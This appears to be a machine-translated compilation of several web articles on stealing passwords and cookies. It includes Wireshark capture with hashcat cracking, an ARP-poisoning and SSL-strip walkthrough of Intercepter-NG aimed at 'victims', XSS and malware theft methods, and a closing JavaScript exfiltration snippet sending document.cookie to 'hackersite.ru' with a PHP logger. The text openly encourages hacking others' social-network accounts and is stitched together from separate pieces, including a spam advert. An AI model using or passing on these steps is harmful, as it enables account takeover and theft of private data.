Methods for stealing cookies. Methods of stealing cookies Physical access to data

Many users do not even realize that by filling in the login and password when registering or authorizing on a closed Internet resource and pressing ENTER, this data can easily be intercepted. Very often they are transmitted over the network in an unprotected form. Therefore, if the site on which you are trying to log in uses the HTTP protocol, then it is very easy to capture this traffic, analyze it using Wireshark, and then use special filters and programs to find and decrypt the password.

The best place to intercept passwords is in the core of the network, where traffic of all users goes to closed resources (for example, mail) or in front of the router to access the Internet, when registering with external resources. We set up a mirror and we are ready to feel like a hacker.

Step 1. Install and run Wireshark to capture traffic

Sometimes it is enough to select only the interface through which we plan to capture traffic and click the Start button. In our case, we capture over the wireless network.

Traffic capture has begun.

Step 2. Filtering captured POST traffic

We open a browser and try to log in to any resource using a username and password. Upon completion of the authorization process and opening the site, we stop capturing traffic in Wireshark. Next, open the protocol analyzer and see a large number of packets. It is at this stage that most IT professionals give up because they don't know what to do next. But we know and we are interested in specific packages that contain POST data, which are formed on our local machine when filling out the form on the screen and sent to remote server when you click the "Login" or "Authorization" button in the browser.

We enter a special filter in the window to display captured packets: http.request.method == “POST "

And instead of a thousand packages, we see only one with the data we are looking for.

Step 3. Find the username and password

Quick right-click and select the item from the menu Follow TCP Steam

After that, text will appear in a new window, which in the code restores the content of the page. Let's find the fields "password" and "user", which correspond to the password and username. In some cases, both fields will be easy to read and not even encrypted, but if we are trying to capture traffic when accessing very well-known resources such as Mail.ru, Facebook, Vkontakte, etc., then the password will be encoded:

HTTP / 1.1 302 Found

Server: Apache / 2.2.15 (CentOS)

X-Powered-By: PHP / 5.3.3

P3P: CP = "NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Set-Cookie: password = ; expires = Thu, 07-Nov-2024 23:52:21 GMT; path = /

Location: loggedin.php

Content-Length: 0

Connection: close

Content-Type: text / html; charset = UTF-8

Thus, in our case:

Username: networkguru

Password:

Step 4. Determining the type of encoding to decrypt the password

We go, for example, to the site http://www.onlinehashcrack.com/hash-identification.php#res and enter our password in the identification window. I was given a list of coding protocols in order of priority:

Step 5. Decrypting user password

At this stage, we can use the hashcat utility:

~ # hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

At the output, we received a decrypted password: simplepassword

Thus, with the help of Wireshark, we can not only solve problems in the operation of applications and services, but also try ourselves as a hacker, intercepting passwords that users enter in web forms. You can also find out passwords to user mailboxes using simple filters to display:

• The POP protocol and filter looks like this: pop.request.command == "USER" || pop.request.command == "PASS"
• IMAP and filter will be: imap.request contains "login"
• SMTP protocol and you will need to enter the following filter: smtp.req.command == "AUTH"

and more serious utilities for decrypting the encoding protocol.

Step 6. What if the traffic is encrypted and using HTTPS?

There are several options to answer this question.

Option 1. Connect to disconnect the connection between the user and the server and capture the traffic at the moment the connection is established (SSL Handshake). At the moment of establishing a connection, you can intercept the session key.

Option 2. You can decrypt HTTPS traffic using the session key log file recorded by Firefox or Chrome. To do this, the browser must be configured to write these encryption keys to a log file (example based on FireFox) and you should get this log file. Basically, you need to steal the session key file with hard disk another user (which is illegal). Well, then grab traffic and use the resulting key to decrypt it.

Clarification. We are talking about the web browser of a person who is trying to steal a password. If we mean decrypting our own HTTPS traffic and want to practice, then this strategy will work. If you're trying to decrypt other users' HTTPS traffic without access to their computers, it won't work - that's both encryption and privacy.

After receiving the keys for option 1 or 2, you need to register them in WireShark:

1. Go to the Edit - Preferences - Protocols - SSL menu.
2. Set the flag "Reassemble SSL records spanning multiple TCP segments".
3. "RSA keys list" and click Edit.
4. We enter data in all fields and write the path in the file with the key

About what are dangerous open points Wifi access, about what passwords can intercept.

Today we will consider intercepting passwords over Wi Fi and intercepting cookies over Wi Fi using the program.

The attack will occur at the expense of sniffing.

Sniffing- sniff translates to "sniff". Sniffing allows you to analyze network activity on the network, view which sites the user visits and intercept passwords. But it can also be used for useful purposes, for wiretapping viruses that send any data to the Internet.

The method I will show is rather primitive and simple. In fact, you can use the program more heavily.
The official website of the sniff.su program (copy the link and open it in a new tab), you can download it in the section "Download".
There is a version for Windows, Unix systems and Android.
We will consider Windows as it is the most popular system and here the program is the most advanced.
Your browser or antivirus may swear that the program is dangerous, but you yourself understand this is a hack program, and it will always react to such programs.
The program is downloaded to zip archive, the program only needs to be unpacked and into a folder and there is no need to install anything.
The program has the ability to arrange various Mitm attacks on Wi Fi networks.
The article is written purely for informational purposes, to show, using an example of the dangers of open WiFi points, any of the indicated actions, you perform at your own peril and risk. And I want to remind you about the criminal responsibility of protecting other people's data.

Service avi1 offers mind-bogglingly cheap prices for the ability to order followers for your Instagram profile. Achieve an increase in online popularity or sales now, without spending a lot of time and effort.

Working with Intercepter NG

So, the program is launched through Intercepter-NG.exe.
The program has an English interface, but if you are a confident computer user I think you can figure it out.

Below there will be a video on setting up (for those who are more comfortable watching than reading).
- Select the desired network at the top if you have several of them.
- Switch type Ethernet / WiFi, if you have Wi Fi, then you need to select the Wi FI icon (to the left of the network selection)

- Press the button Scan Mode(radar icon)
- In an empty field, right-click and click in context menu Smart scan
- All devices connected to the network will be shown
- Choose a victim (you can select everyone with a clamped with the Shift key), just do not mark the router itself, its Ip is usually 192.168.1.1
- Having selected, right-click and click Add to nat

- Go to the tab Nat
- V Stealth ip it is advisable to change the last digit, to any unoccupied one, this will hide your real IP.
- We put a check mark on SSl Strip and SSL Mitm.

- Press Settings(gears on the right).
- Put a tick on Resurrection(This will intercept passwords and cookies of encrypted Https protocol) and Remove Spoof IP / Mac... You can put a tick on Cookie killer, thanks to her, the victim will be thrown out of the current page for example social network and the victim will have to re-enter the password, and we will intercept it. Compare the settings with the picture.

- Here the setting is completed, close the settings with a checkmark.
- The setup is complete, you can start the attack.
- Press the button at the top Start / stop sniffing(triangle), in the same window, click the radiation icon below Start / Stop ARP Poison
- Go to the tab Password mode and click in the window with the right mouse button and select Show Cookies("This will allow showing cookies and passwords entered by victims")
Everything, we are waiting for someone to enter the password.
Sometimes it happens that the Internet stops working, try to go online yourself, if it does not work, restart the program.
I noticed that it is not always possible to intercept the password, but in fact it works almost without failure.

That's all, we have considered intercepting passwords over Wi Fi and intercepting cookies over Wi Fi.

take care of yourself

How to steal cookies

This hacking method like stealing cookies works great and is used by many hackers. If you also want to try it, but do not know what to do, read our recommendations.

What are cookies?

This is information about a user's visit to a specific site. It is kept in a separate text document... There you can find a variety of information. Including logins, passwords, addresses mailboxes and phone numbers. That is why crackers are eager to get hold of these documents. Hackers use different methods to steal the materials they need.

How to steal cookies

XSS vulnerability

It can be found and used on any site. When a specialist finds a vulnerability, he injects it special code... Depending on the purpose, the codes are different, they are written for a specific resource. When a user visits this page and refreshes it, all changes are applied. The code take action - it is injected into the victim's computer and collects all necessary information from the browser.

To enter the code, you can use any type of vulnerability - an error on a web resource, in a browser or on a computer system.

There are 2 types of XSS attacks:

Passive - directed to the page script. In this case, you need to look for vulnerabilities in the elements of the page. For example, a tab with dialogs, a search box, a video directory, etc.

Active - they should be looked for on the server. Especially often they are on various forums, blogs and chats.

How do I get a person to apply XSS?

The task is not easy, because often to activate the code, you need to click on the link with it. You can disguise the link and send it in an email along with an interesting offer. For example, offer a big discount in an online store. You can also embed it all in a picture. The user is likely to view it and not suspect anything.

Sniffer installation

This is the introduction specialized programs for tracking traffic on someone else's device. Sniffer allows you to intercept transmitted sessions with other people's data. So you can get all the logins and passwords, addresses, any important information transmitted over the network by the user. In this case, attacks are most often carried out on unprotected HTTP data. Unsecured wi-fi works well for this.

There are several ways to implement a sniffer:

• Copy traffic;
• Data analysis using traffic attacks;
• Listening to interfaces;
• Sniffer insertion into the channel gap.

Stealing cookies with a virus

Experts advise against using cookies unless there is a particular need for it. If it is possible to disable them, it is best to do so. This is because cookies are very vulnerable. They are often stolen by intruders. A huge amount of personal data can be obtained from these files. confidential information to be used against a person. The most dangerous kind of files are those that remain on the system when the session has already ended.

Cookies are often stolen using a virus utility. This is done quite simply. A virus is introduced into any safe utility that collects certain materials on the computer. The virus program will be linked to its host's server. The program must be configured so that the browser uses it as a proxy server.

When the program gets to the victim's PC, it will automatically start collecting all stored data and send it to you.

Viruses are different, and their functions may also differ. Some allow you to completely control the browser and view any information. Others are capable of stealing protected materials. Still others collect only unprotected data.

You may find it difficult to implement a virus program on someone else's computer. It is necessary to force the user to download it and run it. Here you can either send him a letter with a link to the program, or pass the program off as safe and wait for the person to download it from your site.

How to protect cookies from theft?

Most of the web resources are not secure enough. Hackers easily find vulnerabilities and bugs on these platforms.

Cookie protection rules:

1. Bind the computer id to the current session. Then, when you enter the site from an external device, a new session will be started, the data from the previous one will not be retrieved.
2. Bind the session to the browser. The same principle will work as in the previous paragraph.
3. Encrypt the parameters transmitted over the network. Then the information stored in the document will be impossible to understand. It will be useless to the one who intercepted it. This technique will not protect you 100%, some specialists are able to decipher any material.
4. Create separate folder for identifiers.

How to find out the password from someone else's account through cookies?

To get someone else's data for authorization, you must first get to the file in which they were saved.

For those who use Mozilla Firefox you need to go to the tools tab, which is in the main menu. Further in the system settings you will find the "Protection" section, where you should look for all the important information about accounts in social networks. All passwords are hidden, so click on the "display" button. Right there you can install protection and put a special code. Then no one except you will receive this information.

In Opera, only usernames are available for general viewing. But in the menu you can find a password manager and view all stored on your computer. Full list is in the manager. In order to gain access to passwords, you need to install an additional extension.

V Google chrome all these materials can be seen in advanced settings. There is a tab with all the saved cookies.

Unfortunately the standard Internet browser Explorer does not have these features. To find out information about the web platforms that the owner of the pc visits, you need to download a special program. It can be found on the Internet for free, it is completely safe, but it is better to download it from trusted sources. Do not forget that any program must be checked by an antivirus. This is especially true for those utilities that work with passwords.

This technique is only suitable for those who have physical access to the victim's computer. You can also find out someone else's password if a person is authorized on the platform through your PC and saved their data.

Programs to steal cookies

There are many hacker forums on the Internet where hackers communicate with each other. People go there hoping to get free help... It is there that you can find a huge number of different programs for hacking. We want to warn you that you should not trust these programs. Utilities for remotely stealing cookies from someone else's device - dummies, or virus programs. If you download this software to your pc, then most likely you yourself will fall into the trap of a scammer. Swindlers place their programs for free. Thus, they distribute virus software and gain control over other people's PCs. In general, such programs are a scam, you will understand this by their interface and content. If you are going to use any software to extract files, then let them be sniffers. Of course, they are not easy to use. And it's not easy to find a good sniffer on the Internet. But such software is available from specialists who can sell it to you for money. Remember that there are many scammers, each with their own tricks. You should only trust trusted hackers who have a good reputation, have reviews and have their own website.

In conclusion, I would like to note that stealing cookies is a really powerful method, the effectiveness of which is very high. If you want to hack someone's profile on a social network or messenger, be sure to consider this option. This method works best when you can use the victim's computer. Getting materials from a distance is much more difficult, but you can use our advice and try to apply this method in practice.

In chapter

Have you noticed that returning to a site that you have already visited, that the site recognizes you and opens with the settings that you applied the last time? Yes, and quite often? This is due to cookies that store information about visitors such as login, password, session ID and other variables required to identify the visitor and display the page content according to the user's preferences, selected by him during the last visit to the resource. The WebCookiesSniffer program will show the user the cookies and their content of the sites that are viewed by the user in the browser.

Viewing Cookies

You open the site and WebCookiesSniffer captures cookies s in real time. The utility adds all caught cookies to a table that stores data about the host, the request path, the total length of the cookie, the number of variables in the cookie, and the cookie itself itself with the names of variables and values. The collected information about cookies WebCookiesSniffer can save in text file... The program also has the ability to generate an HTML report for all or selected cookies. For the program to work, you need to install the WinPcap driver (included in the archive with WebCookiesSniffer). So that the language WebCookiesSniffer programs became Russian, copy the file WebCookiesSniffer_lng.ini to the directory with the utility (also included in the archive).

Screenshots of WebCookiesSniffer

What is a cookie?

There is a mechanism that allows the http server to save some text information, and then contact her. This information called a cookie. In fact, each cookie is a pair: the name of the parameter and its value. Also, each cookie is assigned the domain to which it belongs. For security reasons, in all browsers, the http server is only allowed to access the cookie for its domain. Additionally, cookies can have an expiration date, then they will be stored on the computer until this date, even if you close all browser windows.

In all multi-user systems, cookies are used to identify a user. Rather, the current connection of the user to the service, user session. If someone recognizes your cookies, they will be able to log in on your behalf. Because at the moment, very few Internet resources are checking the change of IP-address during one user session.

Browser developers do not provide built-in cookie editing tools. But you can get by with a regular notepad.

Windows Registry Editor Version 5.00



@ = "C: \\ IE_ext.htm"

We save it under the name IE_ext.reg

Step 2: Using the created file, add changes to the Windows registry.

Step 3: create a text file with text

< script language = "javascript">
external.menuArguments.clipboardData.setData ("Text", external.menuArguments.document.cookie);

external.menuArguments.document.cookie = "testname = testvalue; path = /; domain = testdomain.ru";
alert (external.menuArguments.document.cookie);

Step 4: We go to the website of interest to us.

Step 5: Right button mouse clicks on free space page and select the menu item "Working with Cookies"... We allow access to the clipboard. The clipboard will contain your cookie of this site. You can paste their notepad and see.

Step 6: To change some cookie, edit the file C: \ IE_ext.htm, replacing testname to the name of the cookie, testvalue- on its value, testdomain.ru- to the site domain. If necessary, add more similar lines. For ease of control, I added the output of the current cookies before and after the change to the script: alert (external.menuArguments.document.cookie);

Step 7: Perform Step 5 again, and then refresh the page.

Bottom line: we will go to this website with updated cookies.

How to steal a cookie using JavaScript?

If an attacker managed to find a way to execute arbitrary JavaScript on the victim's computer, then he can very easily read the current cookies. Example:

var str = document.cookie;

But will he be able to transfer them to his site, because, as I indicated earlier, a JavaScript script will not be able to access a site located in a different domain without additional confirmation? It turns out that a JavaScript script can load any image located on any http server. At the same time, send any text information in the download request to this picture. Example: http://hackersite.ru/xss.jpg?text_info Therefore, if you run this code:

var img = new Image ();

img.src = "http://hackersite.ru/xss.jpg?"+ encodeURI (document.cookie);

How to handle such requests to upload a "picture"?

An attacker only needs to find a hosting with php support and place code like this there:

$ uid = urldecode ($ _ SERVER ["QUERY_STRING"]);
$ fp = fopen ("log.txt", "a");
fputs ($ fp, "$ uid \ n");
fclose ($ fp);
?>

Then all parameters of requests to this script will be saved in the file log.txt... It remains only in the previously described JavaScript script to replace http://hackersite.ru/xss.jpg to the path to the given php script.

I have shown only the simplest way to exploit XSS vulnerabilities. But this proves that the presence of at least one such vulnerability on a multi-user Internet site can allow an attacker to use its resources on your behalf.